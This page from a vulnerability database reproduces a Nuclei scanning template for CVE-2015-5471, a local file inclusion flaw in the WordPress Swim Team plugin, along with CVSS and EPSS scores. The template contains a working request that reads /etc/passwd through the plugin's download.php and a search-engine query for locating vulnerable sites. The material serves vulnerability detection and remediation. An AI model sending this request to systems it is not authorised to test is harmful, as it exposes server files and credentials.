Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-5471
HistoryOct 25, 2021 - 11:04 p.m.

Swim Team <= v1.44.10777 - Local File Inclusion

2021-10-2523:04:56
ProjectDiscovery
github.com
10
cve2015
wordpress
wp-plugin
lfi
wpscan
packetstorm
swim_team_project
unauthenticated
arbitrary
files
system
upgrade

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.4

Confidence

High

EPSS

0.11

Percentile

95.2%

The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.

id: CVE-2015-5471

info:
  name: Swim Team <= v1.44.10777 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
  impact: |
    An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code.
  remediation: Upgrade to Swim Team version 1.45 or newer.
  reference:
    - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
    - http://www.vapid.dhs.org/advisory.php?v=134
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5471
    - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
    - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2015-5471
    cwe-id: CWE-22
    epss-score: 0.14014
    epss-percentile: 0.95676
    cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: swim_team_project
    product: swim_team
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-swimteam"
  tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201bdf38a3e9f23744d2a793a19f5fdeadd16297d031cbfe68b899cb9960bc9730022100bd87559c0a83dbe87b065f7f381c804560fc2a151ebde23a9a969442df5bedcc:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.4

Confidence

High

EPSS

0.11

Percentile

95.2%